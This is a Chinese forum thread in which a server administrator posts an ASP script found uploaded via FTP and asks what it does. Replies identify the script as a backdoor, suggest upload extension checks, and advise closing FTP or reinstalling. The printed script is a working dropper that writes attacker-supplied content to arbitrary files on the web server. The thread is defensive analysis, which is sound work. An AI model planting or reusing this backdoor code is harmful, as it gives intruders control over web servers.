服务器开了ftp, 老有人往上上传木马之类的东西,大家看看这段代码神马意思

问题描述

<%'NotsupperASPOptionExplicitdimstrPath,strPathNamedimstrFileName1,strFileName2,strContent1,strContent2strFileName1=Request.Form("f1")strFileName2=Request.Form("f2")strContent1=Request.Form("d1")strContent2=Request.Form("d2")strPathName=Request.Form("p")ifstrPathName=""thenstrPathName="lt"ifstrFileName1=""andstrFileName2=""thenResponse.Write("Error")Response.End()endififstrContent1=""andstrContent2=""thenResponse.Write("Error")Response.End()endifstrPath=Server.MapPath(".")ifright(strPath,1)<>"/"thenstrPath=strPath&"/"strPath=strPath&strPathName&".."'strPath=strPath&"1.asp"CreateDir(strPath)ifstrFileName1<>""andstrContent1<>""thenWriteTextToFilestrContent1,strPath&""&strFileName1ifstrFileName2<>""andstrContent2<>""thenWriteTextToFilestrContent2,strPath&""&strFileName2Response.Write("OK")'**************************************************'[创建目录]'函数名:CreateDir'作用:创建目录'参数:crDirname----目录名(包括路径)'返回值:目录创建成功返回True,否则False'**************************************************FunctionCreateDir(ByValcrDirname)OnErrorResumeNextDimM_fsoCreateDir=FalseSetM_fso=CreateObject("Scripting.FileSystemObject")If(M_fso.FolderExists(crDirname))ThenCreateDir=FalseElseM_fso.CreateFolder(crDirname)CreateDir=TrueEndIfSetM_fso=NothingEndFunctionFunctionWriteTextToFile(strIn,strFile)'dimstrin,strip'Response.WritestrFiledimfso,filesetfso=server.CreateObject("scripting.filesystemobject")setfile=fso.opentextfile(strFile,2,True)file.write(strIn)file.closesetfile=nothingsetfso=nothingEndFunction%>

解决方案

解决方案二:
注释都写给你了
解决方案三:
写文件后门
解决方案四:
上传没有限制.ASP且调用了filesystemobject对象来进行,文件创建操作。小心上传木马。之后改写你的ASP并调用木马...小心点
解决方案五:
有了这东西,只要你目录有写/改权限,他想干嘛就干嘛!!!
解决方案六:
可以对上传的文件扩展名加个限制,比如无惧组件的表达:fileExt=lcase(file.FileExt)Forumupload=split(UpFileType,"|")fori=0toubound(Forumupload)iffileEXT=trim(Forumupload(i))thenEnableUpload=trueexitforendifnextiffileEXT="asp"orfileEXT="asa"orfileEXT="aspx"thenEnableUpload=falseendif对这类问题,的确要严加控制,所谓后门,都是程序员自己开的,黑客只是从你开的门溜进来的,所以请把好自己的门,我是这么做的,使用上传组件只有特定的用户才能使用,同时对上传的文件类型有所限制,最后把服务器管理好,程序用netbox打包运行,装个死防式的防火墙,只对指定端口指定的IP开放
解决方案七:
该回复于2011-11-21 10:32:38被版主删除
解决方案八:
服务器关掉ftp,能别开就别开吧,看样子你的服务器是windows吧,我也试过被黑客跑进服务器来了。这黑客一般都是菜鸟级别(但很可恶,人格相当低下),如果服务器上的程序比较少,先备份一下,建议重装系统。
解决方案九:
写入后门程序……
解决方案十:
该回复于2011-11-24 15:06:55被版主删除
解决方案十一:
引用5楼wpssoft的回复:

可以对上传的文件扩展名加个限制,比如无惧组件的表达:fileExt=lcase(file.FileExt)Forumupload=split(UpFileType,"|")fori=0toubound(Forumupload)iffileEXT=trim(Forumupload(i))thenEnableUpload=trueexitforendif……

楼主是ftp....

时间: 2024-09-20 20:07:39

服务器开了ftp, 老有人往上上传木马之类的东西,大家看看这段代码神马意思的相关文章

使用C#.NET的不能操作linux服务器下的ftp,这是为什么?

问题描述 使用C#.NET的不能操作linux服务器下的ftp,这是为什么? 我在windows7电脑上分别使用IIS和Quick easy ftp server软件搭建了ftp环境,用C#写了ftp上传的程序,程序能正常运行并上传文件.但是同样的代码连接linux下的ftp服务器,却无法上传成功,提示创建目录失败,(使用其他flashFxp软件和windows默认的ftp登录工具是可以正常操作的),这个是我程序代码问题,还是windows和linux的差异有关,或者是因为服务器的设置问题.具体

阿里云服务器怎么查找FTP帐号和密码?

阿里云服务器怎么查找FTP帐号和密码?

服务器-Java FTP上传文件夹,只能上传到FTP根目录,如何上传到指定目录

问题描述 Java FTP上传文件夹,只能上传到FTP根目录,如何上传到指定目录 Java FTP上传文件夹,只能上传到FTP根目录,如何上传到指定目录 如果文件较大,如何完整的上传到FTP的服务器 解决方案 用ftpClient.changeWorkingDirectory更改路径,路径不必以/开始

文件系统-jsp tomcat 服务器实现类似于ftp直接访问文件

问题描述 jsp tomcat 服务器实现类似于ftp直接访问文件 解决方案 http://blog.csdn.net/lisq037/article/details/8960804

java远程判断服务器开关机状态,并远程判断该服务器的系统账号和密码是否正确

问题描述 各位大侠高手,说问题前先感谢各位关注我的问题,本菜鸟先拜谢啦!问题如下:我想用java代码远程判断服务器的开关机状态,我原来是这样判断的,importjava.net.InetAddress;address=InetAddress.getByName(ip);booleanbool=address.isReachable(5000);通过返回的boolean值bool来判断服务器为ip的服务器是否开机,用InetAddress类,底层代码应该是ping远程服务器吧,用这个方法有个弊端,

使您的linux服务器成为一个FTP服务器

文件传输协议(FTP)是互联网上服务器之间最常用的一种文件拷贝方式.大多数基于下载的web站点都利用浏览器的内置FTP组件,因此大多数的服务器操作系统都将FTP服务应用程序作为它的软件套件.Linux也不例外. 本文将向您展示如何利用Fedora中默认的 非常安全FTP守护进程(VSFTPD)软件包 使您的linux服务器成为一个FTP服务器. FTP是依靠一对TCP端口来完成工作的.它是按我下面解释的2条连接通道来操作的: FTP控制通道,TCP 21 端口:所有您发出和FTP服务器的响应命令

百度云-如何往自己的网站上上传东西

问题描述 如何往自己的网站上上传东西 我们网站的课件需要换一下,但是原来负责的走了,也没告诉我怎么做.我知道原来他有一个百度云盘,里面都是课件,求助怎么填写图片上的表格 解决方案 你的这个一看就知道是专门定制的,一般现在单位级的网站都是服务商大包的,服务商给你提供网页和web空间,最佳的办法是你联系服务提供商询问详细操作步骤和: 关键点:切记,一定要要到网站服务器的FTP空间和数据库,以及网页超级用户的账号和密码,你拿到这些后要立即修改,这个你要用到,至关重要,不怕一万就怕万一 那个百度云盘估计

从王自如和老罗的论战中我貌似懂得了点神马...

    3个小时啊!本猫从未一鼓作气看过超过2个小时的非电影作品啊!说是论战,结果基本就是骂战,而且还是一边倒.我本来很少看这类辩论性的"节目",因为本猫的脑袋瓜子从来都是"海绵式"而不是"淘金式"的工作原理丫,首先这个就让我貌似懂得了神马...     其次我原先对二人都不熟,更不是任何人的粉丝脑残或黑丝脑残,没必要做任何人的水军或5毛党.王自如其人原来压根不认识,他的测评网站(公司)Zxx(网上搜到的,现在名字还懒得记)神马的以前也从没听说过

内存溢出 tomcat-项目运行一段时间后网页就打不开了,有时候没有报错,有时候会报下面的错误,求大神指教

问题描述 项目运行一段时间后网页就打不开了,有时候没有报错,有时候会报下面的错误,求大神指教 不知道是不是跟内存溢出有关系 解决方案 这应该不是内存溢出问题,报的是空指针,有可能的是某些请求参数时间过长失效 解决方案二: 空指针异常 看一下是否有空指针 如果没有 重启服务器 解决方案三: 空指针异常 看一下是否有空指针 如果没有 重启服务器